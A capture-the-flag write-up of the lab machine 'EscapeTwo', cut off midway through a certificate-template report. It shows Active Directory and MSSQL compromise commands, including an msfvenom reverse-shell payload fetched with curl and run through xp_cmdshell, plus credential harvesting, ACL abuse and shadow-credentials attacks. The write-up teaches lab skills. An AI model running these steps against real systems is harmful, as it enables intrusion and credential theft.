EscapeTwo

Synopsis

EscapeTwo is a easy windows machine created by ruycr4ft and Llo0zy. The user rose is authenticated in SMB and we found Accounting Department Share which contains the files. The file contains the password for sql_svc user. By using the sql_svc credentials and leveraging xp_cmdshell we get the shell. The sql configuration file contains the password for user ryan. The shell is accessed using evil-winrm. The bloodhound shows us that the ryan has some privileges over ca_svc. The privileges is used to modify ownership of ca_svc. Gaining the full-control over ca_svc, the vulnerable certificate DunderMifflinAuthentication is found, which is vulnerable to ESC4 attack and which is exploited to privilege escalated into Administrator.

OS	Difficulty	Points	Release Date	Retired Date
Windows	Easy	20	11-01-2025	24-05-2025

The credentials is given for the following account rose / KxEPkKe6R8su.

---

OSINT

Previous Machines

The retired Escape Machine is a medium difficulty Windows machine. The machine allows the guest user in SMB and gets the credientials for MSSQL. The database stores the crackable hash of user ryan.cooper and we can get shell via winrm using the credentials. The enumeration of user ryan reveals that the vulnerable certificate template is exploitable to ESC1 attack and gain the administrator certificate and uses it to get the administrator hash.

Escape

https://www.hackthebox.com/machines/escape

---

Enumeration

Nmap

Started the nmap scan and found the Active Directory running.

nmap -Pn -sC -sV --min-rate=500 10.10.11.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-11 20:26 EST
Nmap scan report for 10.10.11.51
Host is up (1.8s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-12 01:27:08Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-12T01:28:52+00:00; 0s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-12T01:28:50+00:00; 0s from scanner time.
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-01-12T01:28:51+00:00; 0s from scanner time.
| ms-sql-info: 
|   10.10.11.51:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.11.51:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-11T19:02:17
|_Not valid after:  2055-01-11T19:02:17
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-12T01:28:51+00:00; 0s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-12T01:28:50+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-01-12T01:28:15
|_  start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.05 seconds

Add sequel..htb and DC01.sequel.htb in /etc/hosts file.

SMB - rose

The given credentials can be used to authenticate into SMB.

nxc smb 10.10.11.51 -u 'rose' -p 'KxEPkKe6R8su'
SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su 
SMB         10.10.11.51     445    DC01             [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.

Enumerating the shares and downloading all the files from the share.

nxc smb 10.10.11.51 -u 'rose' -p 'KxEPkKe6R8su' -M spider_plus -o DOWNLOAD_FLAG=True 
SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su 
SMB         10.10.11.51     445    DC01             [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SPIDER_PLUS 10.10.11.51     445    DC01             [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.51     445    DC01             [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.11.51     445    DC01             [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.11.51     445    DC01             [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.51     445    DC01             [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.51     445    DC01             [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.51     445    DC01             [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.10.11.51     445    DC01             [*] Enumerated shares
SMB         10.10.11.51     445    DC01             Share           Permissions     Remark
SMB         10.10.11.51     445    DC01             -----           -----------     ------
SMB         10.10.11.51     445    DC01             Accounting Department READ            
SMB         10.10.11.51     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.51     445    DC01             C$                              Default share
SMB         10.10.11.51     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.51     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.51     445    DC01             SYSVOL          READ            Logon server share 
SMB         10.10.11.51     445    DC01             Users           READ
SPIDER_PLUS 10.10.11.51     445    DC01             [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.51.json".
SPIDER_PLUS 10.10.11.51     445    DC01             [*] SMB Shares:           6 (Accounting Department, ADMIN$, C$, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.51     445    DC01             [*] SMB Readable Shares:  4 (Accounting Department, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.51     445    DC01             [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.10.11.51     445    DC01             [*] Total folders found:  20
SPIDER_PLUS 10.10.11.51     445    DC01             [*] Total files found:    8
SPIDER_PLUS 10.10.11.51     445    DC01             [*] File size average:    3.75 KB
SPIDER_PLUS 10.10.11.51     445    DC01             [*] File size min:        23 B
SPIDER_PLUS 10.10.11.51     445    DC01             [*] File size max:        9.98 KB
SPIDER_PLUS 10.10.11.51     445    DC01             [*] File unique exts:     5 (.pol, .cmtx, .xlsx, .ini, .inf)
SPIDER_PLUS 10.10.11.51     445    DC01             [*] Downloads successful: 1
SPIDER_PLUS 10.10.11.51     445    DC01             [*] Unmodified files:     7
SPIDER_PLUS 10.10.11.51     445    DC01             [*] All files were not changed.
SPIDER_PLUS 10.10.11.51     445    DC01             [+] All files processed successfully.

The Accounting Department share has accounting_2024.xlsx and accounts.xlsx files.

cat /tmp/nxc_hosted/nxc_spider_plus/10.10.11.51.json

{
    "Accounting Department": {
        "accounting_2024.xlsx": {
            "atime_epoch": "2024-06-09 06:50:41",
            "ctime_epoch": "2024-06-09 05:45:02",
            "mtime_epoch": "2024-06-09 07:11:31",
            "size": "9.98 KB"
        },
        "accounts.xlsx": {
            "atime_epoch": "2024-06-09 06:52:21",
            "ctime_epoch": "2024-06-09 06:52:07",
            "mtime_epoch": "2024-06-09 07:11:31",
            "size": "6.62 KB"
        }
    },
    "NETLOGON": {},
    "SYSVOL": {
        "sequel.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
            "atime_epoch": "2025-01-04 11:19:49",
            "ctime_epoch": "2024-06-08 12:39:50",
            "mtime_epoch": "2025-01-04 11:19:49",
            "size": "23 B"
        },
        "sequel.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2025-01-03 06:29:53",
            "ctime_epoch": "2024-06-08 12:39:50",
            "mtime_epoch": "2025-01-03 06:29:53",
            "size": "2 KB"
        },
        "sequel.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2025-01-04 11:19:49",
            "ctime_epoch": "2025-01-04 11:19:23",
            "mtime_epoch": "2025-01-04 11:19:49",
            "size": "3.53 KB"
        },
        "sequel.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/comment.cmtx": {
            "atime_epoch": "2025-01-04 11:19:49",
            "ctime_epoch": "2025-01-04 11:19:23",
            "mtime_epoch": "2025-01-04 11:19:49",
            "size": "554 B"
        },
        "sequel.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
            "atime_epoch": "2025-01-03 06:29:09",
            "ctime_epoch": "2024-06-08 12:39:50",
            "mtime_epoch": "2025-01-03 06:29:09",
            "size": "23 B"
        },
        "sequel.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2025-01-03 06:29:09",
            "ctime_epoch": "2024-06-08 12:39:50",
            "mtime_epoch": "2025-01-03 06:29:09",
            "size": "7.3 KB"
        }
    }
}

Files - Account Department Share [ rose ]

Checking both the files in linux system reveals that they are compressed files.

file accounts.xlsx
accounts.xlsx: Zip archive data, made by v2.0, extract using at least v2.0, last modified, last modified Sun, Jun 09 2024 10:47:44, uncompressed size 681, method=deflate

Extract the accounts.xlsx file and enumerate the files.

unzip accounts.xlsx
Archive:  accounts.xlsx
file #1:  bad zipfile offset (local header sig):  0
  inflating: xl/workbook.xml         
  inflating: xl/theme/theme1.xml     
  inflating: xl/styles.xml           
  inflating: xl/worksheets/_rels/sheet1.xml.rels  
  inflating: xl/worksheets/sheet1.xml  
  inflating: xl/sharedStrings.xml    
  inflating: _rels/.rels             
  inflating: docProps/core.xml       
  inflating: docProps/app.xml        
  inflating: docProps/custom.xml     
  inflating: [Content_Types].xml 

The shareStrings.xml file contains the password for some users.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24">
    <si><t xml:space="preserve">First Name</t></si>
    <si><t xml:space="preserve">Last Name</t></si>
    <si><t xml:space="preserve">Email</t></si>
    <si><t xml:space="preserve">Username</t></si>
    <si><t xml:space="preserve">Password</t></si>
    
    <si><t xml:space="preserve">Angela</t></si>
    <si><t xml:space="preserve">Martin</t></si><si>
    <t xml:space="preserve">angela@sequel.htb</t></si>
    <si><t xml:space="preserve">angela</t></si>
    <si><t xml:space="preserve">0fwz7Q4mSpurIt99</t></si>

    <si><t xml:space="preserve">Oscar</t></si>
    <si><t xml:space="preserve">Martinez</t></si>
    <si><t xml:space="preserve">oscar@sequel.htb</t></si>
    <si><t xml:space="preserve">oscar</t></si>
    <si><t xml:space="preserve">86LxLBMgEWaKUnBG</t></si>

    <si><t xml:space="preserve">Kevin</t></si>
    <si><t xml:space="preserve">Malone</t></si>
    <si><t xml:space="preserve">kevin@sequel.htb</t></si>
    <si><t xml:space="preserve">kevin</t></si>
    <si><t xml:space="preserve">Md9Wlq1E5bZnVDVo</t></si>
    
    <si><t xml:space="preserve">NULL</t></si>
    <si><t xml:space="preserve">sa@sequel.htb</t></si>
    <si><t xml:space="preserve">sa</t></si>
    <si><t xml:space="preserve">MSSQLP@ssw0rd!</t></si>
</sst>

I have prettified the xml for more readability. You will get two lines of xml only.

MSSQL - sa

The above sa user password can be used to authenticate into mssql.

nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --no-bruteforce --local-auth                                 
[*] Initializing NFS protocol database
MSSQL       10.10.11.51     1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL       10.10.11.51     1433   DC01             [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
MSSQL       10.10.11.51     1433   DC01             [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.

The database doesn't contains any credentials so we are going to use the xd_cmdshell of SQL for getting shell as sql_svc user.

---

Foothold

Shell - sql_svc [ xd_cmdshell ]

1

Create the exe file using msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.17 LPORT=8443 -f exe > payload.exe 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes

2

Open the python http server.

python3 -m http http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

3

Run metasploit.

sudo msdb run

[msf](Jobs:0 Agents:0) >> use windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) payload(windows/meterpreter/reverse_tcp) >> set LHOST 10.10.16.17
LHOST => 10.10.16.17
[msf](Jobs:0 Agents:0) payload(windows/meterpreter/reverse_tcp) >> set LPORT 8443
LPORT => 8443
[msf](Jobs:0 Agents:0) payload(windows/meterpreter/reverse_tcp) >> exploit -j
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 10.10.16.17:8443 
[msf](Jobs:1 Agents:0) payload(windows/meterpreter/reverse_tcp) >> 

4

Upload the exe file using xp_cmdshell via nxc.

nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --no-bruteforce --local-auth -x 'curl "http://10.10.16.17:8000/payload.exe" -o "C:\Windows\Temp\payload.exe"'
MSSQL       10.10.11.51     1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL       10.10.11.51     1433   DC01             [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
[23:15:50] ERROR    Error when attempting to execute command via xp_cmdshell: timed out                                                                       mssqlexec.py:28
MSSQL       10.10.11.51     1433   DC01             [+] Executed command via mssqlexec

5

Execute the exe.

nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --no-bruteforce --local-auth -x 'C:\Windows\Temp\payload.exe'
MSSQL       10.10.11.51     1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL       10.10.11.51     1433   DC01             [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
[23:17:52] ERROR    Error when attempting to execute command via xp_cmdshell: timed out                                                                       mssqlexec.py:28
[23:17:57] ERROR    [OPSEC] Error when attempting to disable xp_cmdshell: timed out                                                                           mssqlexec.py:34
MSSQL       10.10.11.51     1433   DC01             [+] Executed command via mssqlexec

6

We got the shell in metasploit.

[msf](Jobs:1 Agents:0) payload(windows/meterpreter/reverse_tcp) >> [*] Sending stage (177734 bytes) to 10.10.11.51
[*] Meterpreter session 1 opened (10.10.16.17:8443 -> 10.10.11.51:56764) at 2025-01-12 20:39:13 -0500
sessions

Active sessions
===============

  Id  Name  Type                     Information            Connection
  --  ----  ----                     -----------            ----------
  1         meterpreter x86/windows  SEQUEL\sql_svc @ DC01  10.10.16.17:8443 -> 10.10.11.51:56764 (10.10.11.51)

---

Privilege Escalation

Shell - ryan

The pillaging of C:/Users directory reveals that the user ryan is present.

[msf](Jobs:1 Agents:1) payload(windows/meterpreter/reverse_tcp) >> sessions 1
[*] Starting interaction with 1...

(Meterpreter 1)(C:\Windows\system32) > cd C:/Users
(Meterpreter 1)(C:\Users) > ls
Listing: C:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  8192  dir   2024-12-25 06:10:09 -0500  Administrator
040777/rwxrwxrwx  0     dir   2018-09-15 03:28:48 -0400  All Users
040555/r-xr-xr-x  8192  dir   2024-06-09 07:17:29 -0400  Default
040777/rwxrwxrwx  0     dir   2018-09-15 03:28:48 -0400  Default User
040555/r-xr-xr-x  8192  dir   2025-01-12 17:57:32 -0500  Public
100666/rw-rw-rw-  174   fil   2018-09-15 03:16:48 -0400  desktop.ini
040777/rwxrwxrwx  8192  dir   2024-06-09 07:15:48 -0400  ryan
040777/rwxrwxrwx  8192  dir   2024-06-08 19:16:48 -0400  sql_svc

(Meterpreter 1)(C:\Users) > 

The C:/ directory has a SQL2019 directory and pillaging the directory we got the config file of MSSQL which contains the ryan password.

(Meterpreter 1)(C:\) > cd SQL2019
(Meterpreter 1)(C:\SQL2019) > ls
Listing: C:\SQL2019
===================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
040777/rwxrwxrwx  4096   dir   2025-01-03 10:29:49 -0500  ExpressAdv_ENU
100666/rw-rw-rw-  38166  fil   2024-06-08 18:07:24 -0400  expradv_filelist_ENU.snp

(Meterpreter 1)(C:\SQL2019) > cd ExpressAdv_ENU
(Meterpreter 1)(C:\SQL2019\ExpressAdv_ENU) > ls
Listing: C:\SQL2019\ExpressAdv_ENU
==================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
040777/rwxrwxrwx  0       dir   2024-06-08 18:07:05 -0400  1033_ENU_LP
100666/rw-rw-rw-  45      fil   2019-09-25 01:03:44 -0400  AUTORUN.INF
100666/rw-rw-rw-  788     fil   2019-09-25 01:03:44 -0400  MEDIAINFO.XML
100666/rw-rw-rw-  16      fil   2024-06-08 18:07:08 -0400  PackageId.dat
100777/rwxrwxrwx  142944  fil   2019-09-25 01:03:46 -0400  SETUP.EXE
100666/rw-rw-rw-  486     fil   2019-09-25 01:03:46 -0400  SETUP.EXE.CONFIG
100666/rw-rw-rw-  249448  fil   2019-09-25 01:03:46 -0400  SQLSETUPBOOTSTRAPPER.DLL
040777/rwxrwxrwx  0       dir   2024-06-08 18:07:06 -0400  redist
040777/rwxrwxrwx  0       dir   2024-06-08 18:07:06 -0400  resources
100666/rw-rw-rw-  717     fil   2024-06-08 18:07:00 -0400  sql-Configuration.INI
040777/rwxrwxrwx  65536   dir   2024-06-08 18:07:06 -0400  x64
(Meterpreter 1)(C:\SQL2019\ExpressAdv_ENU) > cat sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False" 
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
(Meterpreter 1)(C:\SQL2019\ExpressAdv_ENU) >

nxc winrm 10.10.11.51 -u 'administrator' -p 'WqSZAF6CysDQbGb3'
WINRM       10.10.11.51     5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\administrator:WqSZAF6CysDQbGb3

nxc winrm 10.10.11.51 -u 'ryan' -p 'WqSZAF6CysDQbGb3'
WINRM       10.10.11.51     5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
WINRM       10.10.11.51     5985   DC01             [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 (Pwn3d!)

evil-winrm -i 10.10.11.51 -u 'ryan' -p 'WqSZAF6CysDQbGb3'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> 

The user.txt file contains the user flag which is located in the Desktop directory 👏

Pillaging - ryan

Running the whoami /all command reveals that the user is the group member of Certificate Service DCOM Access.

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

USER INFORMATION
----------------

User Name   SID
=========== ============================================
sequel\ryan S-1-5-21-548670397-972687484-3496335370-1114


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
SEQUEL\Management Department                Group            S-1-5-21-548670397-972687484-3496335370-1602 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Bloodhound - ryan -> ca_svc [ path ]

The nxc can also be used as bloodhound ingester. Start the neo4j database, run the nxc and upload the zipped file in bloodhound.

sudo neo4j start
[sudo] password for dexter: 
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:117125). It is available at http://localhost:7474
There may be a short delay until the server is ready

nxc ldap 10.10.11.51 -u 'ryan' -p 'WqSZAF6CysDQbGb3' --bloodhound --collection all --dns-server 10.10.11.51
SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.51     389    DC01             [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 
LDAP        10.10.11.51     389    DC01             [-] Account not found in the BloodHound database.
LDAP        10.10.11.51     389    DC01             Resolved collection methods: acl, group, trusts, session, psremote, objectprops, localadmin, dcom, container, rdp
LDAP        10.10.11.51     389    DC01             Done in 01M 42S
LDAP        10.10.11.51     389    DC01             Compressing output into /home/dexter/.nxc/logs/DC01_10.10.11.51_2025-01-19_075817_bloodhound.zip

The ryan user has some of the privileges in ca_svc account which can be used for further escalation.

The WriteOwner privilage can be used to modify the ownership of ca_svc account to ryan for privilege escalation.

The ca_svc is a member of cert publishers which allows the user to manage certificate templates and publish certificates.

WriteOwner Abuse - changing ca_svc owner to ryan

1

Set the ownership of ca_svc to ryan by abusing WriteOwner privilage.

bloodyAD --host DC01.sequel.htb -d 'sequel.htb' -u 'ryan' -p 'WqSZAF6CysDQbGb3' set owner ca_svc ryan
[+] Old owner S-1-5-21-548670397-972687484-3496335370-512 is now replaced by ryan on ca_svc

2

Granting ryan the full control over ca_svc account.

./dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250119-084205.bak
[*] DACL modified successfully!

Shadow Credentials Attack - Getting NT hash [ ca_svc ]

Now we can add new certificate for shadow credentials attack and retrieve NT hash of that object. More details about it, is given in the link below.

Shadow Credentials - HackTricksbook.hacktricks.wiki

1

Add the new certificate.

pywhisker -d sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3' --target 'ca_svc' --action add
[*] Searching for the target account
[*] Target user found: CN=Certification Authority,CN=Users,DC=sequel,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: ae47c312-590b-ce51-1e08-95e55003bccf
[*] Updating the msDS-KeyCredentialLink attribute of ca_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: JXWcdKwh.pfx
[*] Must be used with password: OonVgV5IJ133IQs4Jyge
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

2

Getting authentication into DC using a newly created certificate.

certipy cert -pfx JXWcdKwh.pfx -password OonVgV5IJ133IQs4Jyge -export -out ca_svc.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'ca_svc.pfx'

3

Getting NT hash

certipy auth -pfx ca_svc.pfx -u ca_svc -domain sequel.htb -dc-ip 10.10.11.51         
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Got hash for 'ca_svc@sequel.htb': aad3b435b51404eeaad3b435b51404ee:3b181b914e7a9d5508ea1e20bc2b7fce

Note: If Clock skew too great error occur use ntpdate to synchronize date and time with the machine.

sudo ntpdate 10.10.11.51
2025-01-19 20:27:11.620925 (+0000) -1066.322115 +/- 0.145228 10.10.11.51 s1 no-leap
CLOCK: time stepped by -1066.322115

Pillaging - Certificate Templates

The certify is used for enumerating and finding vulnerable certificate templates.

1

Export the ticket as environment variable.

export KRB5CCNAME='ca_svc.ccache'

2

Finding vulnerable certificate templates.

certipy find -k -target DC01.sequel.htb -dc-ip 10.10.11.51 -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Saved BloodHound data to '20250119094630_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250119094630_Certipy.txt'
[*] Saved JSON output to '20250119094630_Certipy.json'

3

The json report reveals the vulnerable DunderMifflinAuthentication template and ESC4 attack path.

{
  "Certificate Authorities": {
    "0": {
      "CA Name": "sequel-DC01-CA",
      "DNS Name": "DC01.sequel.htb",
      "Certificate Subject": "CN=sequel-DC01-CA, DC=sequel, DC=htb",
      "Certificate Serial Number": "152DBD2D8E9C079742C0F3BFF2A211D3",
      "Certificate Validity Start": "2024-06-08 16:50:40+00:00",
      "Certificate Validity End": "2124-06-08 17:00:40+00:00",
      "Web Enrollment": "Disabled",
      "User Specified SAN": "Disabled",
      "Request Disposition": "Issue",
      "Enforce Encryption for Requests": "Enabled",
      "Permissions": {
        "Owner": "SEQUEL.HTB\\Administrators",
        "Access Rights": {
          "2": [
            "SEQUEL.HTB\\Administrators",
